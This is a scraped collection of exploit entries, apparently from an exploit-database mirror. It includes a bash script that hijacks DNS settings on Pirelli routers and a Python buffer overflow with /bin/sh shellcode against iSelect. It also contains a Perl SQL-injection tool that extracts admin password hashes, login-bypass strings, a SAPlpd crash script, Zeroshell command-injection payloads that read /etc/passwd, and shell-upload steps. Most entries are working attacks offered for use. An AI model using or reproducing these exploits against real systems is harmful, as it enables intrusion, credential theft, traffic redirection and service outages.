HireHackking 
#!/bin/bash
#
#  Pirelli DRG A115 ADSL Router 
#  Unauthenticated  Remote DNS Change Exploit
#
#  Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
#  https://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#  Description:  
#  The vulnerability exist in the web interface, which is 
#  accessible without authentication. 
#
#  Once modified, systems use foreign DNS servers,  which are 
#  usually set up by cybercriminals. Users with vulnerable 
#  systems or devices who try to access certain sites are 
#  instead redirected to possibly malicious sites.
#  
#  Modifying systems' DNS settings allows cybercriminals to 
#  perform malicious activities like:
#
#    o  Steering unknowing users to bad sites: 
#       These sites can be phishing pages that 
#       spoof well-known sites in order to 
#       trick users into handing out sensitive 
#       information.
#
#    o  Replacing ads on legitimate sites: 
#       Visiting certain sites can serve users 
#       with infected systems a different set 
#       of ads from those whose systems are 
#       not infected.
#   
#    o  Controlling and redirecting network traffic: 
#       Users of infected systems may not be granted 
#       access to download important OS and software 
#       updates from vendors like Microsoft and from 
#       their respective security vendors.
#
#    o  Pushing additional malware: 
#       Infected systems are more prone to other 
#       malware infections (e.g., FAKEAV infection).
#
#  Disclaimer:
#  This or previous programs is for Educational 
#  purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the 
#  fact that Todor Donev is not liable for any 
#  damages caused by direct or indirect use of the 
#  information or functionality provided by these 
#  programs. The author or any Internet provider 
#  bears NO responsibility for content or misuse 
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact 
#  that any damage (dataloss, system crash, 
#  system compromise, etc.) caused by the use 
#  of these programs is not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#  The malicious code doesn't sleeping, he stalking.. 
#

if [[ $# -gt 3 || $# -lt 2 ]]; then
        echo "                    Pirelli DRG A115 " 
        echo "           Unauthenticated Remote DNS Change Exploit"
        echo "  ==================================================================="
        echo "  Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
        echo "  Example: $0 133.7.133.7 8.8.8.8"
        echo "  Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
        echo ""
        echo "      Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
        echo "  https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
        exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
        echo "  Error : libwww-perl not found =/"
        exit;
fi
        GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
HireHackking 
# Exploit developed using Exploit Pack v7.01
# Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com
# Program affected: iSelect
# Affected value: -k, --key=KEY
# Version: 1.4.0-2+b1
#
# Tested and developed under:  Kali Linux 2.0 x86 - https://www.kali.org
# Program description: ncurses-based interactive line selection tool
# iSelect is an interactive line selection tool, operating via a
# full-screen Curses-based terminal session.

# Kali Linux 2.0 package: pool/main/i/iselect/iselect_1.4.0-2+b1_i386.deb
# MD5sum: d5ace58e0f463bb09718d97ff6516c24
# Website: http://www.ossp.org/pkg/tool/iselect/

# Where in the code:
#7  0xb7eaa69f in __strcpy_chk (dest=0xbfffeccc "1\243\376\267\070\360\377\277", src=0xbffff388 "=", 'A' <repeats 199 times>..., destlen=1024) at strcpy_chk.c:30
#8  0x0804bfaa in ?? ()
#9  0x0804914d in ?? ()
#10 0xb7dcd276 in __libc_start_main (main=0x8048f50, argc=2, argv=0xbffff224, init=0x804c020, fini=0x804c090, rtld_fini=0xb7fea8a0 <_dl_fini>, stack_end=0xbffff21c) at ../csu/libc-start.c:291


# Exploit code: Proof of Concept ( Without Fortify )
import os, subprocess

def run():
  try:
    print "# iSelect - Local Buffer Overflow by Juan Sacco"
    print "# This Exploit has been developed using Exploit Pack - http://exploitpack.com"
    # NOPSLED + SHELLCODE + EIP

    buffersize = 1024
    nopsled = "\x90"*30
    shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
    eip = "\x08\xec\xff\xbf"
    buffer = nopsled * (buffersize-len(shellcode)) + eip
    subprocess.call(["iselect -k=",'', buffer])

  except OSError as e:
    if e.errno == os.errno.ENOENT:
        print "Sorry, iSelect binary - Not found!"
    else:
        print "Error executing exploit"
    raise

def howtousage():
  print "Snap! Something went wrong"
  sys.exit(-1)

if __name__ == '__main__':
  try:
    print "Exploit iSelect -  Local Overflow Exploit"
    print "Author: Juan Sacco - Exploit Pack"
  except IndexError:
    howtousage()
run()
HireHackking 
#!/usr/bin/perl -w

# iTechscripts Freelancer Script v5.11 (sk) SQL Injection Vulnerability
# Author	: v3n0m
# Contact	: v3n0m[at]outlook[dot]com
# Date		: January, 11-2017 GMT +7:00 Jakarta, Indonesia
# Software	: Freelancer Script
# Version	: 5.11 Lower versions may also be affected
# Price 	: US$199.00
# Link  	: http://itechscripts.com/freelancer-script/
# Greetz	: YOGYACARDERLINK, CAFE BMW, Dhea Fathin Karima & YOU !!
sub clear{
	system(($^O eq 'MSWin32') ? 'cls' : 'clear');
}
clear();
print "|----------------------------------------------------|\n";
print "| iTechscripts Freelancer Script 5.11 SQLi Exploiter |\n";
print "| Coded by : v3n0m                                   |\n";
print "| Greetz   : YOGYACARDERLINK                         |\n";
print "|----------------------------------------------------|\n";
use LWP::UserAgent;
print "\nInsert Target:[http://wwww.target.com/path/]: ";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress...\n";
print "\n";
$concat="group_concat(username,char(58),password)";
$table="admin_user";
$dheakarima = LWP::UserAgent->new() or die "Could not initalize browser\n";
$dheakarima->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "category.php?sk=-9999+union+all+select+null,null,".$concat.",null+from/**/".$table."+--+";
$xf2r = $dheakarima->request(HTTP::Request->new(GET=>$host));
$answer = $xf2r->content; 
if ($answer =~/([0-9a-fA-F]{32})/) {
	print "\n[+] Admin Password : $1\n";
	print "[+] Success !! Check target for details...\n";
	print "\n";
}
else{print "\n[-] Failed\n";
}
HireHackking 
# # # # # 
# Vulnerability: Movie Portal Script v7.35 - SQL Injection Web Vulnerability
# Google Dork: Movie Portal Script
# Date:11.01.2017
# Vendor Homepage: http://itechscripts.com/movie-portal-script/
# Script Name: Movie Portal Script
# Script Version: v7.35
# Script Buy Now: http://itechscripts.com/movie-portal-script/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# 
# SQL Injection/Exploit :
# http://localhost/[PATH]/artist.php?a=[SQL]
# http://localhost/[PATH]/movie.php?f=[SQL]
# E.t.c.... Other files, too. There are security vulnerabilities.
# Category,User E.t.c.. Add/Edit/Delete There are security vulnerabilities.
# # # # #
HireHackking 
In modules/codec/adpcm.c, VLC can be made to perform an out-of-bounds
write with user-controlled input.

The function DecodeAdpcmImaQT at adpcm.c:595 allocates a buffer which
is filled with bytes from the input stream. However, it does not check
that the number of channels in the input stream is less than or equal
to the size of the buffer, resulting in an out-of-bounds write. The
number of channels is clamped at <= 5.

adpcm_ima_wav_channel_t channel[2];
...
for( i_ch = 0; i_ch < p_dec->fmt_in.audio.i_channels; i_ch++ )
{
    channel[i_ch].i_predictor  = (int16_t)((( ( p_buffer[0] << 1 )|(
p_buffer[1] >> 7 ) ))<<7);
    channel[i_ch].i_step_index = p_buffer[1]&0x7f;
...

The mangling of the input p_buffer above and in
AdpcmImaWavExpandNibble() makes this difficult to exploit, but there
is a potential for remote code execution via a malicious media file.

POC:

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41025.mov
HireHackking 
# Vulnerability: Dating Script v3.25 - SQL Injection
# Date: 11.01.2017
# Software link: http://itechscripts.com/dating-script/
# Demo: http://dating.itechscripts.com
# Price: 199$
# Category: webapps
# Exploit Author: Dawid Morawski
# Website: http://www.morawskiweb.pl
# Contact: dawid.morawski1990@gmail.com
#######################################


1. Description
An attacker can exploit this vulnerability to read from the database.

2. SQL Injection / Proof of Concept:
Vulnerable Parametre: id
http://localhost/[PATH]/see_more_details.php?id=[SQL]
HireHackking 
# Vulnerability: Job Portal Script v9.11 Authentication bypass
# Date: 12.01.2017
# Software link: http://itechscripts.com/job-portal-script/
# Demo:  http://job-portal.itechscripts.com
# Price: 199$
# Category: webapps
# Exploit Author: Dawid Morawski
# Website: http://www.morawskiweb.pl
# Contact: dawid.morawski1990@gmail.com
#######################################


Go to http://localhost/[PATH]/admin/index.php and set:

Username: admin
Password: ' or '1'='1
HireHackking 
# Vulnerability: Online Food Delivery v2.04 Authentication bypass
# Date: 12.01.2017
# Software link: http://itechscripts.com/food-delivery/
# Demo: http://restaurant.itechscripts.com
# Price: 49$
# Category: webapps
# Exploit Author: Dawid Morawski
# Website: http://www.morawskiweb.pl
# Contact: dawid.morawski1990@gmail.com
#######################################


Go to http://localhost/[PATH]/admin/admin_login.php and set:

Username: 1' or 1=1 -- -
Password: anything
HireHackking 
# Exploit Title: SAPlpd 7.40 Denial of Service
# Date: 2016-12-28
# Exploit Author: Peter Baris
# Exploit code: http://saptech-erp.com.au/resources/saplpd_dos.zip
# Version: 7.40 all patch levels (as a part of SAPGui 7.40)  
# Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64


import socket

# Opcodes 03h and 04h are vulnerable to bad characters 00h and 0ah
# So you can modify the DoS accordingly
# The added 800 A's are just to show, that you can deliver a complete shell with the command

DoS = ("\x03"+"\x0a"+"\x41"*800)


s = socket.socket()
s.settimeout(1)
s.connect(('192.168.198.132', 515))
print("[*] Crashing SAPlpd 7.40")
print("[*] Payload length: "+str(len(DoS))+" bytes")
s.send(DoS)
s.close()
HireHackking 
# Exploit Title: aSc Timetables 2017 input field buffer overflow and code execution
# Date: 2017-01-12
# Exploit Author: Peter Baris
# Exploit code: http://saptech-erp.com.au/resources/Timetables.zip
# Exploit documentation: http://saptech-erp.com.au/resources/TimeTables_2017.pdf
# Software Link: http://www.asctimetables.com/download/aScTimeTables.exe  
# Version: 1.0.0.1
# Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64, Windows Server 2012 R2 x64, Windows Server 2016 x64

POC:

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41031.zip
HireHackking 
# # # # # 
# Vulnerability:(Profile) Arbitrary Shell Upload
# Google Dork: Penny Auction Script
# Date:11.01.2017
# Vendor Homepage: http://www.tibsolutions.com/tibs-eauction/
# Script Name: Penny Auction Script
# Script Buy Now: http://www.hotscripts.com/listing/penny-auction-software-156843/  
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
#Exploit :
#Register in site ... and login 
#Goto profil
#Empty file .htaccess and Shell.php...
HireHackking 
####################################################################################################################################
# Exploit Title: Zeroshell - Net Services  Unauthenticated Remote Code Execution | RCE
# Date: 13.01.2017
# Exploit Author: Ozer Goker
# Vendor Homepage: http://www.zeroshell.org
# Software Link: www.zeroshell.org/download/
# Version: 3.6.0 & 3.7.0
####################################################################################################################################

Introduction

Zeroshell is a small Linux distribution for servers and embedded devices with the aim to provide network services. It is available in the form of live CD or compact Flash image and it can be configured using a web browser. The main features of Zeroshell include: load balancing and failover of multiple Internet connections, UMTS/HSDPA connections by using 3G modems, RADIUS server for providing secure authentication and automatic management of encryption keys to wireless networks, captive portal to support web login, and many others.


Vulnerabilities: Unauthenticated Remote Code Execution | RCE


RCE details:

####################################################################################################################################

RCE 1

URL
http://192.168.0.75/cgi-bin/kerbynet?Action=StartSessionSubmit&User=%27%26cat%20/etc/passwd%26%27&PW=

METHOD
Get,Post

PARAMETER
User

PAYLOAD
%27%26cat%20/etc/passwd%26%27


####################################################################################################################################

RCE 2

URL
http://192.168.0.75/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%26cat%20/etc/passwd%26%27

METHOD
Get

PARAMETER
x509type

PAYLOAD
%27%26cat%20/etc/passwd%26%27


####################################################################################################################################

RCE 3

URL
http://192.168.0.75/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=%22%26cat%20/etc/passwd%26%22

METHOD
Get

PARAMETER
type

PAYLOAD
%22%26cat%20/etc/passwd%26%22


####################################################################################################################################
HireHackking 
# # # # # 
# Vulnerability:(Profile) Arbitrary Shell Upload
# Google Dork: ECommerce-Multi-Vendor Software
# Date:11.01.2017
# Vendor Homepage: http://www.tibsolutions.com/multi-vendor/
# Script Name: ECommerce-Multi-Vendor Software
# Script Buy Now: http://www.tibsolutions.com/multi-vendor/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
#Exploit :
#Register in site ... and login 
#Goto profil
#Empty file .htaccess and Shell.php...
HireHackking 
# # # # # 
# Vulnerability:(Profile) Arbitrary Shell Upload
# Google Dork: ECommerce-TIBSECART
# Date:11.01.2017
# Vendor Homepage: http://www.tibsolutions.com/tibs-ecart/
# Script Name: ECommerce-TIBSECART
# Script Buy Now: http://www.tibsolutions.com/tibs-ecart/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
#Exploit :
#Register in site ... and login 
#Goto profil
#Empty file .htaccess and Shell.php...
HireHackking 
# # # # # 
# Vulnerability: School Management Software v2.75 - SQL Injection Web Vulnerability
# Google Dork: School Management Software
# Date:11.01.2017
# Vendor Homepage: http://itechscripts.com/school-management-software/
# Script Name: School Management Software
# Script Version: v2.75
# Script Buy Now: http://itechscripts.com/school-management-software/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# 
# SQL Injection/Exploit :
# http://localhost/[PATH]//notice-edit.php?aid=[SQL]
# E.t.c.... Other files, too. There are security vulnerabilities.
# # # # #